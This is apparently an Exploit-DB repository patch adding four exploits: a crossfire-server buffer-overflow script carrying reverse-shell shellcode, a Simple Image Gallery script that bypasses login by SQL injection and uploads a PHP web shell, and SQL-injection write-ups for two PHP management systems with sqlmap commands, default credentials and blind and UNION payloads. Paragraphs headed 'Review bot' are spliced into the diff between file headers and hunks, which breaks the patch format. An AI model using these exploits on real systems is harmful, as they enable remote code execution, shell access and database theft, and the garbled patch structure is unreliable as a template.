From 6f730aa2351189b428b489e9db1244801bba8121 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 19 Aug 2021 05:01:52 +0000
Subject: [PATCH] DB: 2021-08-19

4 changes to exploits/shellcodes

crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)
Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)
COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections
---
 exploits/linux/remote/50216.py |  52 +++++++++
 exploits/php/webapps/50213.txt |  73 ++++++++++++
 exploits/php/webapps/50214.py  |  73 ++++++++++++
 exploits/php/webapps/50215.txt | 203 +++++++++++++++++++++++++++++++++
 files_exploits.csv             |   4 +
 5 files changed, 405 insertions(+)
 create mode 100755 exploits/linux/remote/50216.py
 create mode 100644 exploits/php/webapps/50213.txt
 create mode 100755 exploits/php/webapps/50214.py
 create mode 100644 exploits/php/webapps/50215.txt

diff --git a/exploits/linux/remote/50216.py b/exploits/linux/remote/50216.py
new file mode 100755
index 000000000..d18fc735b
--- /dev/null
+++ b/exploits/linux/remote/50216.py
@@ -0,0 +1,52 @@
+# Exploit Title: crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
+# Exploit Author: Khaled Salem @Khaled0x07
+# Software Link: https://www.exploit-db.com/apps/43240af83a4414d2dcc19fff3af31a63-crossfire-1.9.0.tar.gz
+# Version: 1.9.0
+# Tested on: Kali Linux 2020.4
+# CVE : CVE-2006-1236
+
+#!/bin/python
+import socket
+import time
+
+
+# Crash at 4379
+# EIP Offset at 4368
+# Badchar \x00\x20
+# ECX Size 170
+# CALL ECX 0x080640eb
+
+size = 4379
+
+# Attacker IP: 127.0.0.1 Port: 443
+shellcode = b""
+shellcode += b"\xd9\xee\xd9\x74\x24\xf4\xb8\x60\x61\x5f\x28"
+shellcode += b"\x5b\x33\xc9\xb1\x12\x31\x43\x17\x03\x43\x17"
+shellcode += b"\x83\xa3\x65\xbd\xdd\x12\xbd\xb6\xfd\x07\x02"
+shellcode += b"\x6a\x68\xa5\x0d\x6d\xdc\xcf\xc0\xee\x8e\x56"
+shellcode += b"\x6b\xd1\x7d\xe8\xc2\x57\x87\x80\xab\xa7\x77"
+shellcode += b"\x51\x3c\xaa\x77\x50\x07\x23\x96\xe2\x11\x64"
+shellcode += b"\x08\x51\x6d\x87\x23\xb4\x5c\x08\x61\x5e\x31"
+shellcode += b"\x26\xf5\xf6\xa5\x17\xd6\x64\x5f\xe1\xcb\x3a"
+shellcode += b"\xcc\x78\xea\x0a\xf9\xb7\x6d"
+
+
+
+
+try:
+ filler = "\x90"*(4368 - 170) + shellcode+"\x90"*(170-len(shellcode))
+ EIP = "\xeb\x40\x06\x08"
+ padding = "C" * (4379 - len(filler) - len(EIP))
+ payload = filler + EIP + padding
+ inputBuffer = "\x11(setup sound "+ payload +"\x90\x00#"
+ print("Sending Buffer with size:" + str(len(payload)))
+ s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
+ s.connect(("192.168.1.4",13327)) # Server IP Address: 192.168.1.4
+ print(s.recv(1024))
+
+ s.send(inputBuffer)
+ s.close()
+
+except:
+ print("Could not connect")
+ exit(0)
\ No newline at end of file
diff --git a/exploits/php/webapps/50213.txt b/exploits/php/webapps/50213.txt
new file mode 100644
index 000000000..083df99fe
--- /dev/null
+++ b/exploits/php/webapps/50213.txt
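Review bot: The `#!/bin/python` interpreter line sits on line 8 of the new file, after the header comments, so it is an ordinary comment with no effect; a shebang is only honoured as the very first line, so it should be moved above `# Exploit Title:` (and `#!/usr/bin/env python3` is the portable form). `import time` and `size = 4379` are never used — the length is repeated as a literal in the `padding` line — so either drop them or write `padding = "C" * (size - len(filler) - len(EIP))` so the constant has one home. For anyone triaging, the header is thinner than the other three entries in this commit: it cites CVE-2006-1236 but carries no vendor homepage or fixed-version line, and a `# Vendor Homepage: <crossfire project URL>` plus a note of the first patched release would make the entry far more useful to defenders than the PoC itself.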
@@ -0,0 +1,73 @@
+# Exploit Title: Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)
+# Date: 17/08/2021
+# Exploit Author: Davide 't0rt3ll1n0' Taraschi
+# Vendor Homepage: https://www.sourcecodester.com/users/osman-yahaya
+# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
+# Version: 1.0
+# Testeted on: Linux (Ubuntu 20.04) using LAMPP
+
+## Impact:
+ An authenticated user may be able to read data for which is not authorized, tamper with or destroy data, or possibly even read/write files or execute code on the database server.
+
+## Description:
+ All four parameters passed via POST are vulnerable:
+ `fname` is vulnerable both to boolean-based blind and time-based blind SQLi
+ `oname` is vulnerable both to boolean-based blind and time-based blind SQLi
+ `username` is only vulnerable to time-based blind SQLi
+ `status` is vulnerable both to boolean-based blind and time-based blind SQLi
+
+## Remediation:
+Here is the vulnerable code:
+
+if($status==''){
+ mysqli_query($dbcon,"update userlogin set surname='$fname', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());
+}
+if(!empty($status)){
+ mysqli_query($dbcon,"update userlogin set surname='$fname',status='$status', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());
+}
+
+As you can see the parameters described above are passed to the code without being checked, this lead to the SQLi.
+To patch this vulnerability, i suggest to sanitize those variables via `mysql_real_escape_string()` before being passed to the prepared statement.
+
+## Exploitation through sqlmap
+1) Log into the application (you can try the default creds 1111:admin123)
+2) Copy your PHPSESSID cookie
+3) Launch the following command:
+sqlmap --method POST -u http://$target/ghpolice/admin/savestaffedit.php --data="fname=&oname=&username=&status=" --batch --dbs --cookie="PHPSESSID=$phpsessid"
+replacing $target with your actual target and $phpsessid with the cookie that you had copied before
+
+## PoC:
+Request:
+POST /ghpolice/admin/savestaffedit.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 77
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/ghpolice/admin/user.php
+Cookie: PHPSESSID=f7123ac759cd97868df0f363434c423f
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+fname=' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- &oname=&username=&status=
+
+And after 5 seconds we got:
+
+HTTP/1.1 200 OK
+Date: Tue, 17 Aug 2021 14:28:59 GMT
+Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
+X-Powered-By: PHP/7.4.22
+Content-Length: 1074
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+ etc...
\ No newline at end of file
diff --git a/exploits/php/webapps/50214.py b/exploits/php/webapps/50214.py
new file mode 100755
index 000000000..b7e95408b
--- /dev/null
+++ b/exploits/php/webapps/50214.py
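Review bot: The advice in the `## Remediation:` section is wrong on two counts: `mysql_real_escape_string()` belongs to the legacy `mysql` extension that was removed in PHP 7, and the PoC response shows the target on `PHP/7.4.22`, so that function does not exist there; and "before being passed to the prepared statement" mixes two approaches, since the code shown calls `mysqli_query` on an interpolated string and has no prepared statement at all. The fix that actually closes the injection is to rewrite both `update userlogin ...` queries as prepared statements with bound parameters (`mysqli_prepare` + `mysqli_stmt_bind_param`), under which no escaping is needed; I would replace the last sentence with `To patch this vulnerability, rewrite both queries as prepared statements (mysqli_prepare + mysqli_stmt_bind_param) so that $fname, $oname, $status and $staffid are bound as parameters instead of being interpolated into the SQL string.` Note that `$staffid` is interpolated into the WHERE clause of both queries too, yet is absent from the four-parameter list under `## Description:`; where it originates is not shown, so readers should not take it as safe. Minor: `Testeted on` in the header is a typo for `Tested on`.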
@@ -0,0 +1,73 @@
+# Exploit Title: Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)
+# Date: 17.08.2021
+# Exploit Author: Tagoletta (Tağmaç)
+# Software Link: https://www.sourcecodester.com/php/14903/simple-image-gallery-web-app-using-php-free-source-code.html
+# Version: V 1.0
+# Tested on: Ubuntu
+
+import requests
+import random
+import string
+import json
+from bs4 import BeautifulSoup
+
+url = input("TARGET = ")
+
+if not url.startswith('http://') and not url.startswith('https://'):
+ url = "http://" + url
+if not url.endswith('/'):
+ url = url + "/"
+
+payload= "'; $cmd = ($_GET['cmd']); system($cmd); echo ''; die; } ?>"
+
+session = requests.session()
+
+print("Login Bypass")
+
+request_url = url + "/classes/Login.php?f=login"
+post_data = {"username": "admin' or '1'='1'#", "password": ""}
+bypassUser = session.post(request_url, data=post_data)
+data = json.loads(bypassUser.text)
+status = data["status"]
+
+if status == "success":
+
+ let = string.ascii_lowercase
+
+ shellname = ''.join(random.choice(let) for i in range(15))
+ shellname = 'Tago'+shellname+'Letta'
+
+ print("shell name "+shellname)
+
+ print("\nprotecting user")
+ request_url = url + "?page=user"
+ getHTML = session.get(request_url)
+ getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
+
+ ids = getHTMLParser.find('input', {'name':'id'}).get("value")
+ firstname = getHTMLParser.find('input', {'id':'firstname'}).get("value")
+ lastname = getHTMLParser.find('input', {'id':'lastname'}).get("value")
+ username = getHTMLParser.find('input', {'id':'username'}).get("value")
+
+ print("\nUser ID : " + ids)
+ print("Firsname : " + firstname)
+ print("Lasname : " + lastname)
+ print("Username : " + username + "\n")
+
+ print("shell uploading")
+
+ request_url = url + "/classes/Users.php?f=save"
+ request_headers = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary9nI3gVmJoEZoZyeA"}
+ request_data = "------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ids+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+firstname+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+lastname+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+username+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA--\r\n"
+ upload = session.post(request_url, headers=request_headers, data=request_data)
+
+ if upload.text == "1":
+ print("- OK -")
+ req = session.get(url + "/?page=user")
+ parser = BeautifulSoup(req.text, 'html.parser')
+ find_shell = parser.find('img', {'id':'cimg'})
+ print("Shell URL : " + find_shell.get("src") + "?cmd=whoami")
+ else:
+ print("- NO :( -")
+else:
+ print("No bypass user")
\ No newline at end of file
diff --git a/exploits/php/webapps/50215.txt b/exploits/php/webapps/50215.txt
new file mode 100644
index 000000000..b5b586d7a
--- /dev/null
+++ b/exploits/php/webapps/50215.txt
@@ -0,0 +1,203 @@
+# Exploit Title: COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections
+# Date: 17-08-2021
+# Exploit Author: Halit AKAYDIN (hLtAkydn)
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
+# Version: V1
+# Category: Webapps
+# Tested on: Linux/Windows
+
+# Description:
+# PHP Dashboards is prone to an SQL-injection vulnerability
+# because it fails to sufficiently sanitize user-supplied data before using
+# it in an SQL query.Exploiting this issue could allow an attacker to
+# compromise the application, access or modify data, or exploit latent
+# vulnerabilities in the underlying database.
+
+# Vulnerable Request:
+
+POST /check_availability.php HTTP/1.1
+Host: localhost
+Content-Length: 12
+sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
+Accept: */*
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/add-phlebotomist.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
+Connection: close
+
+employeeid=1
+
+# Vulnerable Payload:
+
+# Parameter: employeeid (POST)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload:
+
+employeeid=1' AND 2323=2323 AND 'gARj'='gARj
+
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+employeeid=1' AND (SELECT 5982 FROM (SELECT(SLEEP(10)))aPnu) AND 'bDQl'='bDQl
+
+------------------------------------------------------------------------------
+
+# Vulnerable Request:
+
+POST /add-phlebotomist.php HTTP/1.1
+Host: localhost
+Content-Length: 61
+Cache-Control: max-age=0
+sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/add-phlebotomist.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
+Connection: close
+
+empid=1&fullname=dsadas&mobilenumber=1111111111&submit=Submit
+
+# Vulnerable Payload:
+
+# Parameter: empid (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+empid=1' AND (SELECT 4626 FROM (SELECT(SLEEP(10)))jVok) AND 'bqxW'='bqxW&fullname=dsadas&mobilenumber=1111111111&submit=Submit
+
+------------------------------------------------------------------------------
+
+# Vulnerable Request:
+
+POST /edit-phlebotomist.php?pid=6 HTTP/1.1
+Host: localhost
+Content-Length: 61
+Cache-Control: max-age=0
+sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/edit-phlebotomist.php?pid=6
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
+Connection: close
+
+empid=1&fullname=dsadas&mobilenumber=1111111111&update=Update
+
+# Vulnerable Payload:
+
+# Parameter: fullname (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+empid=1&fullname=dsadas' AND (SELECT 6868 FROM (SELECT(SLEEP(10)))yvbu) AND 'xVJk'='xVJk&mobilenumber=1111111111&update=Update
+
+------------------------------------------------------------------------------
+
+# Vulnerable Request:
+
+POST /bwdates-report-result.php HTTP/1.1
+Host: localhost
+Content-Length: 51
+Cache-Control: max-age=0
+sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/bwdates-report-ds.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
+Connection: close
+
+fromdate=2021-08-17&todate=2021-08-17&submit=Submit
+
+# Vulnerable Payload:
+
+# Parameter: fromdate (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+fromdate=2021-08-17' AND (SELECT 6977 FROM (SELECT(SLEEP(10)))pNed) AND 'qbnJ'='qbnJ&todate=2021-08-17&submit=Submit
+
+------------------------------------------------------------------------------
+
+# Vulnerable Request:
+
+POST /search-report-result.php HTTP/1.1
+Host: localhost
+Content-Length: 27
+Cache-Control: max-age=0
+sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/search-report.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
+Connection: close
+
+serachdata=32&search=Search
+
+# Vulnerable Payload:
+
+# Parameter: serachdata (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+serachdata=1231') AND (SELECT 1275 FROM (SELECT(SLEEP(10)))queW) AND ('HkZa'='HkZa&search=Search
+
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 7 columns
+# Payload:
+
+serachdata=1231') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71706b7671,0x4a6d476c4861544c4c66446b6961755076707354414d6f5150436c766f6b4a624955625159747a4d,0x7170717071),NULL,NULL-- -&search=Search
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 95bb08dd5..9af7832d1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
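Review bot: The `# Description:` block is a copy-paste from a different advisory: its first line says `PHP Dashboards is prone to an SQL-injection vulnerability` while the title, vendor link and every request on the page concern COVID19 Testing Management System 1.0, so it should read `# COVID19 Testing Management System 1.0 is prone to an SQL-injection vulnerability` (and `query.Exploiting` is missing a space). The five injectable inputs — `employeeid` in check_availability.php, `empid` in add-phlebotomist.php, `fullname` in edit-phlebotomist.php, `fromdate` in bwdates-report-result.php and `serachdata` in search-report-result.php — can only be recovered by reading each request block, so a one-line summary of them near the header, plus a remediation line (prepared statements with bound parameters for each of those inputs), would help anyone triaging. Every request also carries the same `PHPSESSID` cookie and the Referers point at administrative pages, which suggests these endpoints require a logged-in session; if that is the case the title should say `(Authenticated)` as 50213.txt's does, and if not, a sentence stating that the endpoints are reachable without a session belongs in the description, since that distinction drives the severity.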
@@ -18522,6 +18522,7 @@ id,file,description,date,author,type,platform,port
 50145,exploits/hardware/remote/50145.txt,"KevinLAB BEMS 1.0 - Undocumented Backdoor Account",2021-07-21,LiquidWorm,remote,hardware,
 50160,exploits/hardware/remote/50160.txt,"Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)",2021-07-28,"Ivan Nikolsky",remote,hardware,
 50170,exploits/java/remote/50170.java,"Neo4j 3.4.18 - RMI based Remote Code Execution (RCE)",2021-08-02,"Christopher Ellis",remote,java,
+50216,exploits/linux/remote/50216.py,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",2021-08-18,"Khaled Salem",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -44339,3 +44340,6 @@ id,file,description,date,author,type,platform,port
 50209,exploits/hardware/webapps/50209.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)",2021-08-16,LiquidWorm,webapps,hardware,
 50210,exploits/hardware/webapps/50210.txt,"COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure",2021-08-16,LiquidWorm,webapps,hardware,
 50211,exploits/hardware/webapps/50211.txt,"GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE",2021-08-17,"Ken Pyle",webapps,hardware,
+50213,exploits/php/webapps/50213.txt,"Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-08-18,"Davide Taraschi",webapps,php,
+50214,exploits/php/webapps/50214.py,"Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-18,Tagoletta,webapps,php,
+50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",2021-08-18,"Halit AKAYDIN",webapps,php,